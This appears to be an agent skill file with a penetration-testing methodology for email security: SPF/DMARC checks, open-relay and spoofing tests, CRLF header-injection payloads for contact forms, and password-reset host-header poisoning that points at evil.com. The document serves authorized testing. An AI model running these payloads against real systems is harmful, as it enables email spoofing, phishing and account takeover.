// Offensive email security assessment covering SMTP open relay, SPF/DKIM/DMARC bypass, email header injection, and email-based attack vectors during authorized penetration tests.
Systematic methodology for discovering novel vulnerabilities through manual code auditing, fuzzing, reverse engineering, and creative attack chaining during authorized security assessments.
Systematic methodology for safely confirming and documenting exploited vulnerabilities with reproducible proof, ensuring zero false positives before reporting.
Identifying and exploiting insecure file upload functionality to achieve remote code execution, stored XSS, path traversal, and denial of service during authorized penetration tests.
Identifying and exploiting dangling DNS records pointing to unclaimed cloud services, enabling subdomain takeover for phishing, cookie stealing, and authentication bypass during authorized penetration tests.
Testing WordPress, Drupal, Joomla, and other CMS platforms for known vulnerabilities, plugin/theme exploits, misconfigured permissions, and CMS-specific attack vectors during authorized penetration tests.
Performs firmware image extraction and analysis using binwalk to identify embedded filesystems, compressed archives, bootloaders, kernel images, and cryptographic material. Covers entropy analysis for detecting encrypted or compressed regions, recursive extraction of nested archives, SquashFS/CramFS/JFFS2 filesystem mounting, and string analysis for credential and configuration discovery. Activates for requests involving firmware reverse engineering, IoT device analysis, embedded system security assessment, or router/camera firmware extraction.
| name | performing-email-security-testing |
| description | Offensive email security assessment covering SMTP open relay, SPF/DKIM/DMARC bypass, email header injection, and email-based attack vectors during authorized penetration tests. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | ["penetration-testing","email-security","smtp-testing","spf-bypass","dmarc-testing","email-spoofing","header-injection"] |
| version | 1.0 |
| author | xalgord |
| license | Apache-2.0 |
apt install swaks)Map the target's email ecosystem before testing.
# === MX RECORD DISCOVERY ===
dig MX target.example.com +short
# Example output:
# 10 mx1.target.example.com.
# 20 mx2.target.example.com.
# === SPF RECORD CHECK ===
dig TXT target.example.com +short | grep "v=spf1"
# Analyze SPF strictness:
# ~all = soft fail (can be bypassed)
# -all = hard fail (strict, good)
# ?all = neutral (no enforcement)
# +all = allow all (MISCONFIGURATION)
# No SPF = NO protection
# === DMARC RECORD CHECK ===
dig TXT _dmarc.target.example.com +short
# Analyze DMARC policy:
# p=none → monitoring only, no enforcement (WEAK)
# p=quarantine → suspicious mail goes to spam
# p=reject → spoofed mail is blocked (STRONG)
# No DMARC record → NO protection
# === DKIM RECORD CHECK ===
# Common DKIM selectors to try
for SELECTOR in default google s1 s2 k1 selector1 selector2 dkim mail; do
RESULT=$(dig TXT ${SELECTOR}._domainkey.target.example.com +short 2>/dev/null)
if [ -n "$RESULT" ]; then
echo "DKIM found: ${SELECTOR}._domainkey.target.example.com"
echo "$RESULT"
fi
done
# === SMTP SERVICE ENUMERATION ===
for MX in $(dig MX target.example.com +short | awk '{print $2}'); do
echo "=== $MX ==="
nmap -sV -p 25,465,587 "$MX" --script smtp-commands,smtp-enum-users
done
# === WEBMAIL DISCOVERY ===
for PREFIX in mail webmail email owa outlook autodiscover; do
CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${PREFIX}.target.example.com" 2>/dev/null)
if [ "$CODE" != "000" ] && [ "$CODE" != "404" ]; then
echo "Found: https://${PREFIX}.target.example.com → HTTP $CODE"
fi
done
Test if the mail server allows unauthenticated relay.
# === IMPORTANT: Use agentmail for all test addresses ===
# Create test inbox first:
# agentmail action=create_inbox name=smtp_relay_test
# === MANUAL SMTP RELAY TEST ===
# Connect to target SMTP server
# WARNING: Only test with agentmail addresses as recipient
(
sleep 1; echo "EHLO test.example.com"
sleep 1; echo "MAIL FROM:<test@external-domain.com>"
sleep 1; echo "RCPT TO:<YOUR_AGENTMAIL_ADDRESS>"
sleep 1; echo "DATA"
sleep 1; echo "Subject: Open Relay Test"
sleep 1; echo ""
sleep 1; echo "This is an open relay test."
sleep 1; echo "."
sleep 1; echo "QUIT"
) | openssl s_client -connect mx1.target.example.com:25 -starttls smtp 2>/dev/null
# === SWAKS RELAY TEST (easier) ===
swaks --to YOUR_AGENTMAIL_ADDRESS \
--from spoofed@external-domain.com \
--server mx1.target.example.com \
--port 25 \
--body "Open relay test - authorized pentest" \
--header "Subject: Open Relay Test"
# Check for relay results:
# 250 OK → OPEN RELAY (Critical vulnerability)
# 550/554 Relaying denied → Properly configured
# 421 → Rate limited or blocked
# === VERIFY: Check if email was delivered ===
# agentmail action=wait_for_email inbox_id=INBOX_ID subject="Open Relay" timeout=120
Test if the domain is susceptible to email spoofing.
# === SPF BYPASS TESTING ===
# Test 1: No SPF record → complete spoofing possible
SPF=$(dig TXT target.example.com +short | grep "v=spf1")
if [ -z "$SPF" ]; then
echo "CRITICAL: No SPF record — domain is fully spoofable"
fi
# Test 2: SPF with ~all (softfail) → spoofing may work
echo "$SPF" | grep "~all" && echo "WARN: SPF softfail — spoofing may bypass filters"
# Test 3: SPF with +all → allows any sender
echo "$SPF" | grep "+all" && echo "CRITICAL: SPF +all — explicitly allows spoofing"
# === DMARC BYPASS ASSESSMENT ===
DMARC=$(dig TXT _dmarc.target.example.com +short)
if [ -z "$DMARC" ]; then
echo "CRITICAL: No DMARC record — no email authentication enforcement"
elif echo "$DMARC" | grep -q "p=none"; then
echo "WARN: DMARC p=none — monitoring only, spoofed email will be delivered"
elif echo "$DMARC" | grep -q "p=quarantine"; then
echo "INFO: DMARC p=quarantine — spoofed email goes to spam (partial protection)"
elif echo "$DMARC" | grep -q "p=reject"; then
echo "GOOD: DMARC p=reject — spoofed email will be blocked"
fi
# Check DMARC subdomain policy
echo "$DMARC" | grep -oP 'sp=\w+' || echo "WARN: No subdomain policy — defaults to p= value"
# Check DMARC percentage
echo "$DMARC" | grep -oP 'pct=\d+' || echo "INFO: No pct tag — defaults to 100%"
# === PRACTICAL SPOOFING TEST (to your own agentmail) ===
swaks --to YOUR_AGENTMAIL_ADDRESS \
--from ceo@target.example.com \
--server mx1.target.example.com \
--body "Spoofing test - authorized assessment" \
--header "Subject: SPF/DMARC Spoofing Test" \
--header "Reply-To: attacker@evil.com"
# Check delivery + analyze received headers for SPF/DMARC results
# agentmail action=wait_for_email inbox_id=INBOX_ID subject="Spoofing Test" timeout=120
Test web application email functionality for header injection.
# === CONTACT FORM HEADER INJECTION ===
# Target: forms that send emails (contact, feedback, newsletter signup)
# Test 1: CRLF injection in email field
curl -s -X POST "https://target.example.com/api/contact" \
-H "Content-Type: application/json" \
-d '{
"email": "test@example.com\r\nBcc: YOUR_AGENTMAIL_ADDRESS",
"message": "Header injection test"
}'
# Test 2: Newline injection in name/subject fields
curl -s -X POST "https://target.example.com/api/contact" \
-H "Content-Type: application/json" \
-d '{
"name": "Test\r\nBcc: YOUR_AGENTMAIL_ADDRESS",
"email": "test@example.com",
"message": "Header injection test"
}'
# Test 3: CC/BCC injection via additional headers
curl -s -X POST "https://target.example.com/api/contact" \
-H "Content-Type: application/json" \
-d '{
"email": "test@example.com%0ACc:YOUR_AGENTMAIL_ADDRESS",
"message": "URL-encoded header injection test"
}'
# Test 4: Body injection (multi-part)
curl -s -X POST "https://target.example.com/api/contact" \
-H "Content-Type: application/json" \
-d '{
"email": "test@example.com",
"message": "Normal message\r\n\r\nContent-Type: text/html\r\n\r\n<h1>Injected HTML</h1>"
}'
# === VERIFY: Check if injected headers were processed ===
# agentmail action=wait_for_email inbox_id=INBOX_ID timeout=120
Test for vulnerabilities in password reset flows.
# === HOST HEADER POISONING IN PASSWORD RESET ===
# Attempt to redirect password reset links to attacker domain
curl -s -X POST "https://target.example.com/api/forgot-password" \
-H "Host: evil.com" \
-H "Content-Type: application/json" \
-d '{"email": "victim@target.example.com"}'
# Check if reset link uses evil.com as base URL
# agentmail action=wait_for_email inbox_id=INBOX_ID subject="password" timeout=120
# === RESET TOKEN ANALYSIS ===
# Request multiple reset tokens and analyze patterns
for i in $(seq 1 5); do
curl -s -X POST "https://target.example.com/api/forgot-password" \
-H "Content-Type: application/json" \
-d "{\"email\": \"$AGENTMAIL_ADDRESS\"}"
sleep 2
done
# Collect tokens and check for:
# - Sequential/predictable tokens
# - Short tokens (< 32 chars)
# - Tokens that don't expire
# - Tokens reusable after password change
# === USER ENUMERATION VIA RESET ===
# Check if different responses for valid vs invalid emails
for EMAIL in "existing@target.example.com" "nonexistent@target.example.com" \
"admin@target.example.com" "root@target.example.com"; do
echo -n "$EMAIL → "
curl -s -o /dev/null -w "%{http_code} %{size_download}" \
-X POST "https://target.example.com/api/forgot-password" \
-H "Content-Type: application/json" \
-d "{\"email\": \"$EMAIL\"}"
echo
done
# Different response codes/sizes → user enumeration vulnerability
# === TLS CONFIGURATION CHECK ===
for PORT in 25 465 587; do
echo "=== Port $PORT ==="
echo "QUIT" | openssl s_client -connect mx1.target.example.com:$PORT \
-starttls smtp 2>/dev/null | \
grep -E "Protocol|Cipher|Server certificate"
done
# === CHECK FOR DOWNGRADE ATTACKS ===
# Test if server accepts non-TLS connections on port 25
(echo "EHLO test"; sleep 1; echo "QUIT") | \
nc mx1.target.example.com 25 2>/dev/null | grep -i "STARTTLS"
# If STARTTLS is optional (not enforced) → susceptible to downgrade
| Concept | Description |
|---|---|
| SPF | Sender Policy Framework — specifies which IPs can send email for a domain |
| DKIM | DomainKeys Identified Mail — cryptographic signature verifying email sender |
| DMARC | Domain-based Message Authentication — policy for handling SPF/DKIM failures |
| Open Relay | SMTP server that relays email from unauthenticated senders (Critical) |
| Email Header Injection | Injecting CRLF to add Bcc/Cc headers via web forms |
| Host Header Poisoning | Manipulating Host header to redirect password reset links |
| STARTTLS Downgrade | Forcing SMTP connection to plaintext by stripping TLS negotiation |
| Scenario | Impact | Proof |
|---|---|---|
| No SPF record | Anyone can spoof emails from domain | dig TXT domain shows no v=spf1 |
| DMARC p=none | Spoofed emails delivered to inbox | Email delivered to agentmail with spoofed From |
| Open SMTP relay | Spam/phishing relay through target server | Email delivered via relay to agentmail |
| Header injection in contact form | Attacker controls email recipients | BCC injection delivers to agentmail |
| Predictable reset tokens | Account takeover via token prediction | Sequential tokens with < 32 bit entropy |
| Host header password reset poisoning | Reset link points to attacker domain | Reset email contains evil.com URL |
## Email Security Finding
**Vulnerability**: Missing DMARC Policy — Domain Spoofable
**Severity**: Medium (CVSS 5.3)
**Location**: _dmarc.target.example.com (DNS)
**Type**: Email Authentication Misconfiguration
### Evidence
- SPF Record: v=spf1 include:_spf.google.com ~all (SOFTFAIL)
- DMARC Record: NONE (no _dmarc TXT record exists)
- DKIM: Selector 'google' found with valid key
### Exploitation Proof
Successfully sent spoofed email as ceo@target.example.com
to test inbox. Email was delivered without any authentication
warnings because no DMARC policy exists to enforce SPF/DKIM.
### Impact
- Attackers can send phishing emails appearing to come from target.example.com
- No mechanism to reject or quarantine spoofed messages
- Combined with social engineering, enables targeted spearphishing
### Recommendation
1. Implement DMARC: _dmarc.target.example.com TXT "v=DMARC1; p=reject; rua=mailto:dmarc@target.example.com"
2. Change SPF from ~all (softfail) to -all (hardfail)
3. Enable DMARC reporting to monitor authentication failures
4. Consider implementing BIMI for visual email authentication